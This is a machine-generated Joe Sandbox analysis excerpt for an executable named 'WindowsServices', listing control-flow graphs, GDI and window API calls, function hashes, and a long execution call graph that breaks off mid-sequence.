                                                                        control_flow_graph 1373 404360-4044a9 call 4048b0 call 40adf6 call 40adf0 call 40adea 1382 404552-40455e 1373->1382 1383 4044af-4044b1 1373->1383 1385 404560-404572 CreatePolygonRgn call 40ae02 1382->1385 1386 4045cb-4045d4 CreatePolygonRgn call 40ae02 1382->1386 1383->1382 1384 4044b7-4044bd 1383->1384 1384->1382 1388 4044c3-4044c7 1384->1388 1394 404574-404576 1385->1394 1395 404578 1385->1395 1390 4045d9-4045db 1386->1390 1391 4044cd-4044e3 1388->1391 1392 40454e 1388->1392 1396 4045e6-404667 call 40adcc * 4 1390->1396 1397 4045dd-4045e3 call 40add2 1390->1397 1398 4044e9-404548 _ftol * 2 1391->1398 1392->1382 1399 40457b-4045c9 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1394->1399 1395->1399 1397->1396 1398->1398 1401 40454a-40454c 1398->1401 1399->1390 1401->1392
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 0040450A
                                                                        • _ftol.MSVCRT ref: 00404538
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction ID: 39bea9fad0b66382f5372ed494b3add627d4de448e91ddc4441a9f07906a4bc8
                                                                        • Opcode Fuzzy Hash: 76b59d60c353cbaa1d95a5d0ad8cfcc92339eaeaa5065b38da4cc76092f4088c
                                                                        • Instruction Fuzzy Hash: B09156B19083419FC310DF29C985A5BBBE4FFC4750F018A2EF999A7291DB34D814CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1413 403e10-403f48 call 4048b0 * 2 call 40adf6 call 40adf0 call 40adea 1424 403fd1-403fdd 1413->1424 1425 403f4e-403f50 1413->1425 1427 40404a-404053 CreatePolygonRgn call 40ae02 1424->1427 1428 403fdf-403ff1 CreatePolygonRgn call 40ae02 1424->1428 1425->1424 1426 403f52-403f56 1425->1426 1426->1424 1430 403f58-403f6e 1426->1430 1432 404058-40405a 1427->1432 1438 403ff3-403ff5 1428->1438 1439 403ff7 1428->1439 1433 403f74-403fcb _ftol * 2 1430->1433 1435 404065-4040e6 call 40adcc * 4 1432->1435 1436 40405c-404062 call 40add2 1432->1436 1433->1433 1437 403fcd-403fcf 1433->1437 1436->1435 1437->1424 1442 403ffa-404048 CombineRgn CreatePolygonRgn call 40ae02 CombineRgn 1438->1442 1439->1442 1442->1432
                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 00403F95
                                                                        • _ftol.MSVCRT ref: 00403FBF
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        • Opcode ID: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction ID: d78316a0bae83b4357ed0e5d5a94130920efe7575c7a00bd962797de7769c8fd
                                                                        • Opcode Fuzzy Hash: dbf15af777a9242a6ab4e2c7a6b65f1fdb691b85148fe195744af21802976117
                                                                        • Instruction Fuzzy Hash: 189179B1A083419FC310DF25C985A5BBBF4FF88714F118A2DF99AA7291DB34D914CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                        • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                        • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 3564110013-0
                                                                        • Opcode ID: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                        • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.1428860262.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.1428841807.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1428860262.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429229733.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000005.00000002.1429256075.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                        • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:17.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:1160
                                                                        Total number of Limit Nodes:13
4038f1 CopyRect 3383->3384 3385 404360 7 API calls 3384->3385 3386 403911 CopyRect 3385->3386 3387 404360 7 API calls 3386->3387 3388 403931 CopyRect 3387->3388 3389 403e10 7 API calls 3388->3389 3390 403951 CopyRect 3389->3390 3391 404360 7 API calls 3390->3391 3392 403971 CopyRect 3391->3392 3393 404360 7 API calls 3392->3393 3394 403991 CopyRect 3393->3394 3395 404360 7 API calls 3394->3395 3396 4039b1 SetWindowRgn SetCapture 3395->3396 3396->3064 3397->3070 3398->3074 3399->3078 3400->3082 3401->3086 3402->3090 3403->3094 3404->3098 3405->3102 3406->3106 3407->3110 3408->3114 3409->3118 3410->3122 3411->3126 3412->3130 3413->3134 3414->3138 3415->3142 3416->3146 3417->3150 3418->3154 3419->3158 3420->3162 3421->3166 3422->3170 3423->3174 3424->3178 3425->3182 3426->3186 3427->3190 3428->3194 3429->3198 3430->3202 3431->3206 3432->3210 3433->3214 3434->3218 3435->3222 3436->3226 3437->3230 3438->3234 3439->3238 3440->3242 3441->3246 3442->3250 3443->3254 3444->3258 3445->3262 3446->3266 3447->3270 3448->3274 3449->3278 3450->3282 3451->3286 3452->3290 3453->3294 3454->3298 3455->3302 3456->3306 3457->3310 3458->3314 3459->3318 3460->3322 3461->3326 3462->3330 3463->3334 3464->3338 3465->3342 3467 4043a3 3466->3467 3468 40454a 3467->3468 3472 4044e9 _ftol _ftol 3467->3472 3469 404560 CreatePolygonRgn 3468->3469 3470 4045cb CreatePolygonRgn 3468->3470 3471 404570 3469->3471 3476 4045d9 3470->3476 3473 40457b CombineRgn CreatePolygonRgn 3471->3473 3472->3468 3472->3472 3474 40ae02 3473->3474 3475 40459f CombineRgn 3474->3475 3475->3476 3476->3348 3478 40a940 GetWindowRect 3479 40aa54 ClientToScreen 3478->3479 3480 40a99f 3478->3480 3482 40aa52 3479->3482 3480->3482 3490 4052c0 CopyRect 3480->3490 3483 40a9d0 _ftol 3483->3482 3484 40a9ec 3483->3484 3484->3482 3485 40aa08 GetWindowRect 3484->3485 3486 40aa1f 3485->3486 3487 405300 42 API calls 3486->3487 3488 40aa30 SetWindowRgn 3487->3488 3491 40a440 IsIconic 3488->3491 3490->3483 3492 40a474 3491->3492 3494 40a50d 
3491->3494 3493 40a481 SendMessageA GetSystemMetrics GetSystemMetrics GetClientRect DrawIcon 3492->3493 3508 40a508 3493->3508 3495 40a593 CreateCompatibleDC 3494->3495 3507 40a640 3494->3507 3494->3508 3496 40b05a 3495->3496 3498 40a5b2 LPtoDP CreateCompatibleBitmap 3496->3498 3497 40a65a GetWindowRect 3499 40a67d 3497->3499 3500 40a5ef 3498->3500 3509 404a40 CopyRect 3499->3509 3503 40a5fd GetMapMode 3500->3503 3502 40a68e 3505 40a6ad BitBlt 3502->3505 3502->3508 3504 40b054 3503->3504 3506 40a616 DPtoLP 3504->3506 3505->3508 3506->3507 3507->3497 3508->3482 3510 4039c0 3 API calls 3509->3510 3511 404a71 CopyRect 3510->3511 3512 4039c0 3 API calls 3511->3512 3513 404a91 CopyRect 3512->3513 3514 4039c0 3 API calls 3513->3514 3515 404ab1 CopyRect 3514->3515 3516 4039c0 3 API calls 3515->3516 3517 404ad1 CopyRect 3516->3517 3518 4039c0 3 API calls 3517->3518 3519 404af1 CopyRect 3518->3519 3520 4039c0 3 API calls 3519->3520 3521 404b11 CopyRect 3520->3521 3522 4039c0 3 API calls 3521->3522 3523 404b31 CopyRect 3522->3523 3524 4039c0 3 API calls 3523->3524 3525 404b51 CopyRect 3524->3525 3526 4039c0 3 API calls 3525->3526 3527 404b71 CopyRect 3526->3527 3528 4039c0 3 API calls 3527->3528 3529 404b91 CopyRect 3528->3529 3530 4039c0 3 API calls 3529->3530 3531 404bb1 CopyRect 3530->3531 3532 4039c0 3 API calls 3531->3532 3533 404bd1 CopyRect 3532->3533 3534 4039c0 3 API calls 3533->3534 3535 404bf1 CopyRect 3534->3535 3536 4039c0 3 API calls 3535->3536 3537 404c11 CopyRect 3536->3537 3538 4039c0 3 API calls 3537->3538 3539 404c31 CopyRect 3538->3539 3540 4039c0 3 API calls 3539->3540 3541 404c51 CopyRect 3540->3541 3542 4039c0 3 API calls 3541->3542 3543 404c71 CopyRect 3542->3543 3544 4039c0 3 API calls 3543->3544 3545 404c91 CopyRect 3544->3545 3546 4039c0 3 API calls 3545->3546 3547 404cb1 CopyRect 3546->3547 3548 4039c0 3 API calls 3547->3548 3549 404cd1 CopyRect 3548->3549 3550 4039c0 3 API calls 3549->3550 3551 404cf1 CopyRect 3550->3551 3552 4039c0 3 API calls 
3551->3552 3553 404d11 CopyRect 3552->3553 3554 4039c0 3 API calls 3553->3554 3555 404d31 CopyRect 3554->3555 3556 4039c0 3 API calls 3555->3556 3557 404d51 CopyRect 3556->3557 3558 4039c0 3 API calls 3557->3558 3559 404d71 CopyRect 3558->3559 3560 4039c0 3 API calls 3559->3560 3561 404d91 CopyRect 3560->3561 3562 4039c0 3 API calls 3561->3562 3563 404db1 CopyRect 3562->3563 3564 4039c0 3 API calls 3563->3564 3565 404dd1 CopyRect 3564->3565 3566 4039c0 3 API calls 3565->3566 3567 404df1 CopyRect 3566->3567 3568 4039c0 3 API calls 3567->3568 3569 404e11 CopyRect 3568->3569 3570 4039c0 3 API calls 3569->3570 3571 404e31 CopyRect 3570->3571 3572 4039c0 3 API calls 3571->3572 3573 404e51 CopyRect 3572->3573 3574 4039c0 3 API calls 3573->3574 3575 404e71 CopyRect 3574->3575 3576 4039c0 3 API calls 3575->3576 3577 404e91 CopyRect 3576->3577 3578 4039c0 3 API calls 3577->3578 3579 404eb1 3578->3579 3579->3502 3588 40ad00 DrawTextA 2567 40b10f __set_app_type __p__fmode __p__commode 2568 40b17e 2567->2568 2569 40b192 2568->2569 2570 40b186 __setusermatherr 2568->2570 2579 40b280 _controlfp 2569->2579 2570->2569 2572 40b197 _initterm __getmainargs _initterm 2573 40b1eb GetStartupInfoA 2572->2573 2575 40b21f GetModuleHandleA 2573->2575 2580 40b2a2 69CE4ED0 2575->2580 2578 40b243 exit _XcptFilter 2579->2572 2580->2578 2581 40ac50 TextOutA 2583 40a810 2587 409c60 2583->2587 2585 40a838 ReleaseCapture GetWindowRect 2586 40a863 2585->2586 2588 409c6c 2587->2588 2588->2585 2589 40ac10 PtVisible 3602 40a190 3603 40a198 ReleaseCapture 3602->3603 2590 409e20 2591 409e47 2590->2591 2592 409eaf CreateCompatibleDC 2591->2592 2604 409f5c 2591->2604 2594 40b05a 2592->2594 2593 409f76 GetWindowRect 2595 409f99 2593->2595 2596 409ece LPtoDP CreateCompatibleBitmap 2594->2596 2606 401040 CopyRect 2595->2606 2597 409f0b 2596->2597 2600 409f19 GetMapMode 2597->2600 2599 409fab 2603 409fc3 BitBlt 2599->2603 2605 40a009 2599->2605 2601 40b054 2600->2601 2602 409f32 DPtoLP 2601->2602 2602->2604 
2603->2605 2604->2593 2937 4039c0 2606->2937 2608 401071 CopyRect 2943 404670 2608->2943 2610 401091 CopyRect 2611 4039c0 3 API calls 2610->2611 2612 4010b1 CopyRect 2611->2612 2613 404670 3 API calls 2612->2613 2614 4010d1 CopyRect 2613->2614 2615 4039c0 3 API calls 2614->2615 2616 4010f1 CopyRect 2615->2616 2617 404670 3 API calls 2616->2617 2618 401111 CopyRect 2617->2618 2619 4039c0 3 API calls 2618->2619 2620 401131 CopyRect 2619->2620 2621 404670 3 API calls 2620->2621 2622 401151 CopyRect 2621->2622 2623 4039c0 3 API calls 2622->2623 2624 401171 CopyRect 2623->2624 2625 404670 3 API calls 2624->2625 2626 401191 CopyRect 2625->2626 2627 4039c0 3 API calls 2626->2627 2628 4011b1 CopyRect 2627->2628 2629 404670 3 API calls 2628->2629 2630 4011d1 CopyRect 2629->2630 2631 4039c0 3 API calls 2630->2631 2632 4011f1 CopyRect 2631->2632 2633 404670 3 API calls 2632->2633 2634 401211 CopyRect 2633->2634 2635 4039c0 3 API calls 2634->2635 2636 401231 CopyRect 2635->2636 2637 404670 3 API calls 2636->2637 2638 401251 CopyRect 2637->2638 2639 4039c0 3 API calls 2638->2639 2640 401271 CopyRect 2639->2640 2641 404670 3 API calls 2640->2641 2642 401291 CopyRect 2641->2642 2643 4039c0 3 API calls 2642->2643 2644 4012b1 CopyRect 2643->2644 2645 404670 3 API calls 2644->2645 2646 4012d1 CopyRect 2645->2646 2647 4039c0 3 API calls 2646->2647 2648 4012f1 CopyRect 2647->2648 2649 404670 3 API calls 2648->2649 2650 401311 CopyRect 2649->2650 2651 4039c0 3 API calls 2650->2651 2652 401331 CopyRect 2651->2652 2653 404670 3 API calls 2652->2653 2654 401351 CopyRect 2653->2654 2655 4039c0 3 API calls 2654->2655 2656 401371 CopyRect 2655->2656 2657 404670 3 API calls 2656->2657 2658 401391 CopyRect 2657->2658 2659 4039c0 3 API calls 2658->2659 2660 4013b1 CopyRect 2659->2660 2661 404670 3 API calls 2660->2661 2662 4013d1 CopyRect 2661->2662 2663 4039c0 3 API calls 2662->2663 2664 4013f1 CopyRect 2663->2664 2665 404670 3 API calls 2664->2665 2666 401411 CopyRect 2665->2666 2667 4039c0 3 
API calls 2666->2667 2668 401431 CopyRect 2667->2668 2669 404670 3 API calls 2668->2669 2670 401451 CopyRect 2669->2670 2671 4039c0 3 API calls 2670->2671 2672 401471 CopyRect 2671->2672 2673 404670 3 API calls 2672->2673 2674 401491 CopyRect 2673->2674 2675 4039c0 3 API calls 2674->2675 2676 4014b1 CopyRect 2675->2676 2677 404670 3 API calls 2676->2677 2678 4014d1 CopyRect 2677->2678 2679 4039c0 3 API calls 2678->2679 2680 4014f1 CopyRect 2679->2680 2681 404670 3 API calls 2680->2681 2682 401511 CopyRect 2681->2682 2683 4039c0 3 API calls 2682->2683 2684 401531 CopyRect 2683->2684 2685 404670 3 API calls 2684->2685 2686 401551 CopyRect 2685->2686 2687 4039c0 3 API calls 2686->2687 2688 401571 CopyRect 2687->2688 2689 404670 3 API calls 2688->2689 2690 401591 CopyRect 2689->2690 2691 4039c0 3 API calls 2690->2691 2692 4015b1 CopyRect 2691->2692 2693 404670 3 API calls 2692->2693 2694 4015d1 CopyRect 2693->2694 2695 4039c0 3 API calls 2694->2695 2696 4015f1 CopyRect 2695->2696 2697 404670 3 API calls 2696->2697 2698 401611 CopyRect 2697->2698 2699 4039c0 3 API calls 2698->2699 2700 401631 CopyRect 2699->2700 2701 404670 3 API calls 2700->2701 2702 401651 CopyRect 2701->2702 2703 4039c0 3 API calls 2702->2703 2704 401671 CopyRect 2703->2704 2705 404670 3 API calls 2704->2705 2706 401691 CopyRect 2705->2706 2707 4039c0 3 API calls 2706->2707 2708 4016b1 CopyRect 2707->2708 2709 404670 3 API calls 2708->2709 2710 4016d1 CopyRect 2709->2710 2711 4039c0 3 API calls 2710->2711 2712 4016f1 CopyRect 2711->2712 2713 404670 3 API calls 2712->2713 2714 401711 CopyRect 2713->2714 2715 4039c0 3 API calls 2714->2715 2716 401731 CopyRect 2715->2716 2717 404670 3 API calls 2716->2717 2718 401751 CopyRect 2717->2718 2719 4039c0 3 API calls 2718->2719 2720 401771 CopyRect 2719->2720 2721 404670 3 API calls 2720->2721 2722 401791 CopyRect 2721->2722 2723 4039c0 3 API calls 2722->2723 2724 4017b1 CopyRect 2723->2724 2725 404670 3 API calls 2724->2725 2726 4017d1 CopyRect 2725->2726 
2727 4039c0 3 API calls 2726->2727 2728 4017f1 CopyRect 2727->2728 2729 404670 3 API calls 2728->2729 2730 401811 CopyRect 2729->2730 2731 4039c0 3 API calls 2730->2731 2732 401831 CopyRect 2731->2732 2733 404670 3 API calls 2732->2733 2734 401851 CopyRect 2733->2734 2735 4039c0 3 API calls 2734->2735 2736 401871 CopyRect 2735->2736 2737 404670 3 API calls 2736->2737 2738 401891 CopyRect 2737->2738 2739 4039c0 3 API calls 2738->2739 2740 4018b1 CopyRect 2739->2740 2741 404670 3 API calls 2740->2741 2742 4018d1 CopyRect 2741->2742 2743 4039c0 3 API calls 2742->2743 2744 4018f1 CopyRect 2743->2744 2745 404670 3 API calls 2744->2745 2746 401911 CopyRect 2745->2746 2747 4039c0 3 API calls 2746->2747 2748 401931 CopyRect 2747->2748 2749 404670 3 API calls 2748->2749 2750 401951 CopyRect 2749->2750 2751 4039c0 3 API calls 2750->2751 2752 401971 CopyRect 2751->2752 2753 404670 3 API calls 2752->2753 2754 401991 CopyRect 2753->2754 2755 4039c0 3 API calls 2754->2755 2756 4019b1 CopyRect 2755->2756 2757 404670 3 API calls 2756->2757 2758 4019d1 CopyRect 2757->2758 2759 4039c0 3 API calls 2758->2759 2760 4019f1 CopyRect 2759->2760 2761 404670 3 API calls 2760->2761 2762 401a11 CopyRect 2761->2762 2763 4039c0 3 API calls 2762->2763 2764 401a31 CopyRect 2763->2764 2765 404670 3 API calls 2764->2765 2766 401a51 CopyRect 2765->2766 2767 4039c0 3 API calls 2766->2767 2768 401a71 CopyRect 2767->2768 2769 404670 3 API calls 2768->2769 2770 401a91 CopyRect 2769->2770 2771 4039c0 3 API calls 2770->2771 2772 401ab1 CopyRect 2771->2772 2773 404670 3 API calls 2772->2773 2774 401ad1 CopyRect 2773->2774 2775 4039c0 3 API calls 2774->2775 2776 401af1 CopyRect 2775->2776 2777 404670 3 API calls 2776->2777 2778 401b11 CopyRect 2777->2778 2779 4039c0 3 API calls 2778->2779 2780 401b31 CopyRect 2779->2780 2781 404670 3 API calls 2780->2781 2782 401b51 CopyRect 2781->2782 2783 4039c0 3 API calls 2782->2783 2784 401b71 CopyRect 2783->2784 2785 404670 3 API calls 2784->2785 2786 401b91 CopyRect 
2785->2786 2787 4039c0 3 API calls 2786->2787 2788 401bb1 CopyRect 2787->2788 2789 404670 3 API calls 2788->2789 2790 401bd1 CopyRect 2789->2790 2791 4039c0 3 API calls 2790->2791 2792 401bf1 CopyRect 2791->2792 2793 404670 3 API calls 2792->2793 2794 401c11 CopyRect 2793->2794 2795 4039c0 3 API calls 2794->2795 2796 401c31 CopyRect 2795->2796 2797 404670 3 API calls 2796->2797 2798 401c51 CopyRect 2797->2798 2799 4039c0 3 API calls 2798->2799 2800 401c71 CopyRect 2799->2800 2801 404670 3 API calls 2800->2801 2802 401c91 CopyRect 2801->2802 2803 4039c0 3 API calls 2802->2803 2804 401cb1 CopyRect 2803->2804 2805 404670 3 API calls 2804->2805 2806 401cd1 CopyRect 2805->2806 2807 4039c0 3 API calls 2806->2807 2808 401cf1 CopyRect 2807->2808 2809 404670 3 API calls 2808->2809 2810 401d11 CopyRect 2809->2810 2811 4039c0 3 API calls 2810->2811 2812 401d31 CopyRect 2811->2812 2813 404670 3 API calls 2812->2813 2814 401d51 CopyRect 2813->2814 2815 4039c0 3 API calls 2814->2815 2816 401d71 CopyRect 2815->2816 2817 404670 3 API calls 2816->2817 2818 401d91 CopyRect 2817->2818 2819 4039c0 3 API calls 2818->2819 2820 401db1 CopyRect 2819->2820 2821 404670 3 API calls 2820->2821 2822 401dd1 CopyRect 2821->2822 2823 4039c0 3 API calls 2822->2823 2824 401df1 CopyRect 2823->2824 2825 404670 3 API calls 2824->2825 2826 401e11 CopyRect 2825->2826 2827 4039c0 3 API calls 2826->2827 2828 401e31 CopyRect 2827->2828 2829 404670 3 API calls 2828->2829 2830 401e51 CopyRect 2829->2830 2831 4039c0 3 API calls 2830->2831 2832 401e71 CopyRect 2831->2832 2833 404670 3 API calls 2832->2833 2834 401e91 CopyRect 2833->2834 2835 4039c0 3 API calls 2834->2835 2836 401eb1 CopyRect 2835->2836 2837 404670 3 API calls 2836->2837 2838 401ed1 CopyRect 2837->2838 2839 4039c0 3 API calls 2838->2839 2840 401ef1 CopyRect 2839->2840 2841 404670 3 API calls 2840->2841 2842 401f11 CopyRect 2841->2842 2843 4039c0 3 API calls 2842->2843 2844 401f31 CopyRect 2843->2844 2845 404670 3 API calls 2844->2845 2846 
